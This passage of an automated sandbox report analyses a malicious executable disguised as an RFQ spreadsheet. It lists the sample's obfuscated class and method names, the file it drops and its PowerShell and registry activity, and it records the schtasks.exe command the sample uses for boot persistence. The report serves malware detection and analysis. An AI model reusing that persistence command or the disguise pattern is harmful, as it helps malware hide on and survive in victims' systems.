                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, S4uTr5z7YJMyG0JPGE.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eKVYZlFYBd', 'PEwYX8p87g', 'VOtYowKfA0', 'NylYmCx31I', 'CM4Y0jMyO9', 'SlEYYlL09f', 'CsdYRA58HM'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, hZ9TRjivh2CC91EfYt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'X0LSrTBQP5', 'yTtSIJN8Oa', 'H02Sz97U8S', 'mwDnCjy9Pv', 'E42nGGahrj', 'NXbnSvptGm', 'tqqnnobipD', 'saGI2FQQmKXk73q2q1G'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, sAxS2MJSRGlYALqvZ9.cs High entropy of concatenated method names: 'kB90MogDrp', 'RW00DFKJCu', 'aLY0ib3oL2', 'WcR0xMnveW', 'LvC0KNVStp', 'gTJ0v328Ey', 'GJb06lYPp2', 'Cna0dM3B8p', 'fXa0lsZ8nE', 'fJJ0ARQDM3'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, xJ3quUjxTCHPdrK6rQ.cs High entropy of concatenated method names: 'mXdGvMgrnF', 'h5rG6RuM66', 'WvtGloTWIX', 'XWGGA1qoJR', 'DlxGXmyL0Q', 'xxKGo2Rt1V', 'cxFY9OvLZcN6ESiIpv', 'LHkIpUcgbvgKTH7bnE', 'FHNGGf0O2x', 'BWPGn7TZ16'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, waO3TSuHyF8gZH4h0U.cs High entropy of concatenated method names: 'IhEmluFBeC', 'jrdmAuH19N', 'ToString', 'xICmMScR6F', 'wFimDJfP5W', 'UgmmijA0VD', 'd3Hmxg4aMw', 'Jj9mK1NtLV', 'hqvmvYGLjK', 'QxUm6CigB7'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, srYjTdcb7xHXR2ikdO.cs High entropy of concatenated method names: 'pwZv8Nen0Q', 'eXQv5IiPSd', 'z4svb11qja', 'kpsv1qUKFa', 'knYvkZHsIM', 'Ojdvy4NlOr', 'yjuvs7F5G4', 'fZHvqb8hDu', 'rRivPxEFlK', 'WV8vUrslC1'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, FYINXRa7WnDljwogyG.cs High entropy of concatenated method names: 'x2SXBl4VIE', 'LtPXH3AtKo', 'nxaXa5ce4w', 'vrXXFgMPAV', 'dJeX41QWwQ', 'UWrXTGEUnx', 'i8sXN3uL6Q', 'PZGX2UubPe', 'B6gX7BH9t3', 'HCRXO0papt'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, DoJRnRUQZ8SJGqlxmy.cs High entropy of concatenated method names: 'eJ5xkPv8rx', 'yPBxsROcPo', 'Sh6iTT0STg', 'DFMiNwpE5H', 'qKWi2Wtbwk', 'CDgi7S3LKC', 'yFmiOra0ZR', 'yTjiEkmMKI', 'vLficMP1gP', 'jusiBlrgyk'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, sPshwgSvwCm5KLaMaH.cs High entropy of concatenated method names: 'G3UbUhyTo', 'Nv51p96qR', 'pxYy6stj4', 'msPsm0Wss', 'zYbPEB0Fh', 'xi5UGISgI', 'XDvO9CJofB4me6kT7y', 'xOvNkboYggKS31dyEA', 'i5t0kMK87', 'dZ0RGW935'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, K6uYoxwYkvgQZqPZti.cs High entropy of concatenated method names: 'MSlmJf9su5', 'NVlmIl2RLQ', 'THZ0CdgddE', 'sUv0GPf9wH', 'l4YmpffOXR', 'qmxmHl2nlL', 'or5meRudfy', 'g9hmaZNspi', 'ww3mFtyw0s', 'nvfmVNPqWr'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, irAqRReI113hs4CKMq.cs High entropy of concatenated method names: 'VuBZqZVRHX', 'GmGZPL8RNq', 'OZtZgaV88e', 'KGOZ4JHnwX', 'Y0yZNqnqbg', 'HuRZ2GfjwA', 'CPqZOD0x0w', 'R5aZEOXckS', 'mZxZB7Gw1D', 'cdaZpCBAM4'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, dqNH5EDJbwOd74asBH.cs High entropy of concatenated method names: 'Dispose', 'rN0GrBjrtQ', 'SltS4Fcypp', 'CbQNN8N4u7', 'WRAGIxS2MS', 'tGlGzYALqv', 'ProcessDialogKey', 'n95SCIBlSe', 'dJYSG14MQO', 'auESSmrKNN'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, kdFvaMFVPKs73pA7Ae.cs High entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, DD.cs High entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, ihWImL1h2qjtIkVYDh.cs High entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, oImfMJtvGUo8fMQNBQ.cs High entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, wehuuoKhMKMbnQu72K.cs High entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, BXf6FBO8RUpjNfUvb9.cs High entropy of concatenated method names: 'mhUvMcwqon', 'IAOviKPKa5', 'jVCvKk9uNr', 'oFFKIv2Q9E', 'dXpKz8YSZ4', 'Jn5vCtCapQ', 'HnPvGYHQkj', 'ntSvS3v78y', 'Cq5vnr57wd', 'vh1vjBwX4A'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, t0Q8xKg2Rt1VrenmFW.cs High entropy of concatenated method names: 'H3VKfcptMI', 'ApxKDPuCVh', 'EVXKxXidVL', 'B17KvgMWAR', 'qajK6j4F0j', 'tG1xtnY5cL', 'G7GxwkLdQ7', 'b7gx9q8Hhc', 'LI2xJ2pehw', 'LxAxrJ6I2l'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, z4Lt9BGCCfMS3EUAYkN.cs High entropy of concatenated method names: 'qE8Y8tgVAq', 'uWqY5QBjba', 'aZLYb8He3d', 'jWiY1hu1P4', 'CTjYkhxgjj', 'f8XYyke7OR', 'PrKYsOWfGw', 'dMJYqaOQRj', 'XV3YPGBv3x', 'hMUYUEnKXF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, lMgrnFqi5rRuM663RZ.cs High entropy of concatenated method names: 'pJ6Da2IbYg', 'lhfDFycPY9', 'POqDVajNoF', 'SwfDuqA7o3', 'AMHDtuun4L', 'HTLDwE1eKA', 'oJfD9IEfqC', 'lodDJMpIVO', 'wSiDr85Lhv', 'xpSDIV9aPF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, qrKNNWIs1iYM2TK7gp.cs High entropy of concatenated method names: 'gWoYGhdVAx', 'nCHYn3uVIJ', 'Rn7Yj1uD02', 'TAeYMdTIya', 'kv9YDgKdyO', 'W7mYxm78GO', 'm3lYKARpgE', 'q5q09vm0n9', 'rTq0JqQKOj', 'aU80rUDyVJ'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, uwv9tXGnDnUKhCEBhfI.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VY9RaHt1RX', 'tZeRFu2b5W', 'in6RVpfY3K', 'l2XRuY1cMa', 'omDRt5qpFk', 'FmYRwbvEw2', 'Tr1R9N3amn'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.cs High entropy of concatenated method names: 'sKynf5yHPQ', 'Lg5nMC3SVq', 'dWLnDSdHNB', 'Rq8niDlRBu', 'k1XnxLShZM', 'oQqnKaXL1s', 'HQZnvK96Om', 'YDFn6w8YFe', 'NUZndorCoA', 'Iblnl6gjux'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, FxkmO9PvtoTWIXJWG1.cs High entropy of concatenated method names: 'pfCi1prOjy', 'UYYiy3QDPB', 'VpSiqgDFR5', 'plUiPDBEDc', 'TfTiXUAcEl', 'qXkioceSUY', 'JOWimYSXIM', 'eKTi0PUjvy', 'CwpiYXfkFl', 'C0ViRmCs7f'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, S4uTr5z7YJMyG0JPGE.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eKVYZlFYBd', 'PEwYX8p87g', 'VOtYowKfA0', 'NylYmCx31I', 'CM4Y0jMyO9', 'SlEYYlL09f', 'CsdYRA58HM'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, hZ9TRjivh2CC91EfYt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'X0LSrTBQP5', 'yTtSIJN8Oa', 'H02Sz97U8S', 'mwDnCjy9Pv', 'E42nGGahrj', 'NXbnSvptGm', 'tqqnnobipD', 'saGI2FQQmKXk73q2q1G'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, sAxS2MJSRGlYALqvZ9.cs High entropy of concatenated method names: 'kB90MogDrp', 'RW00DFKJCu', 'aLY0ib3oL2', 'WcR0xMnveW', 'LvC0KNVStp', 'gTJ0v328Ey', 'GJb06lYPp2', 'Cna0dM3B8p', 'fXa0lsZ8nE', 'fJJ0ARQDM3'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, xJ3quUjxTCHPdrK6rQ.csHigh entropy of concatenated method names: 'mXdGvMgrnF', 'h5rG6RuM66', 'WvtGloTWIX', 'XWGGA1qoJR', 'DlxGXmyL0Q', 'xxKGo2Rt1V', 'cxFY9OvLZcN6ESiIpv', 'LHkIpUcgbvgKTH7bnE', 'FHNGGf0O2x', 'BWPGn7TZ16'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, waO3TSuHyF8gZH4h0U.csHigh entropy of concatenated method names: 'IhEmluFBeC', 'jrdmAuH19N', 'ToString', 'xICmMScR6F', 'wFimDJfP5W', 'UgmmijA0VD', 'd3Hmxg4aMw', 'Jj9mK1NtLV', 'hqvmvYGLjK', 'QxUm6CigB7'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, srYjTdcb7xHXR2ikdO.csHigh entropy of concatenated method names: 'pwZv8Nen0Q', 'eXQv5IiPSd', 'z4svb11qja', 'kpsv1qUKFa', 'knYvkZHsIM', 'Ojdvy4NlOr', 'yjuvs7F5G4', 'fZHvqb8hDu', 'rRivPxEFlK', 'WV8vUrslC1'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, FYINXRa7WnDljwogyG.csHigh entropy of concatenated method names: 'x2SXBl4VIE', 'LtPXH3AtKo', 'nxaXa5ce4w', 'vrXXFgMPAV', 'dJeX41QWwQ', 'UWrXTGEUnx', 'i8sXN3uL6Q', 'PZGX2UubPe', 'B6gX7BH9t3', 'HCRXO0papt'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, DoJRnRUQZ8SJGqlxmy.csHigh entropy of concatenated method names: 'eJ5xkPv8rx', 'yPBxsROcPo', 'Sh6iTT0STg', 'DFMiNwpE5H', 'qKWi2Wtbwk', 'CDgi7S3LKC', 'yFmiOra0ZR', 'yTjiEkmMKI', 'vLficMP1gP', 'jusiBlrgyk'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, sPshwgSvwCm5KLaMaH.csHigh entropy of concatenated method names: 'G3UbUhyTo', 'Nv51p96qR', 'pxYy6stj4', 'msPsm0Wss', 'zYbPEB0Fh', 'xi5UGISgI', 'XDvO9CJofB4me6kT7y', 'xOvNkboYggKS31dyEA', 'i5t0kMK87', 'dZ0RGW935'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, K6uYoxwYkvgQZqPZti.csHigh entropy of concatenated method names: 'MSlmJf9su5', 'NVlmIl2RLQ', 'THZ0CdgddE', 'sUv0GPf9wH', 'l4YmpffOXR', 'qmxmHl2nlL', 'or5meRudfy', 'g9hmaZNspi', 'ww3mFtyw0s', 'nvfmVNPqWr'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, irAqRReI113hs4CKMq.csHigh entropy of concatenated method names: 'VuBZqZVRHX', 'GmGZPL8RNq', 'OZtZgaV88e', 'KGOZ4JHnwX', 'Y0yZNqnqbg', 'HuRZ2GfjwA', 'CPqZOD0x0w', 'R5aZEOXckS', 'mZxZB7Gw1D', 'cdaZpCBAM4'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, dqNH5EDJbwOd74asBH.csHigh entropy of concatenated method names: 'Dispose', 'rN0GrBjrtQ', 'SltS4Fcypp', 'CbQNN8N4u7', 'WRAGIxS2MS', 'tGlGzYALqv', 'ProcessDialogKey', 'n95SCIBlSe', 'dJYSG14MQO', 'auESSmrKNN'
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe. File created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe. Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe. Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe. Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe. Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe. Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe. Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe. Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
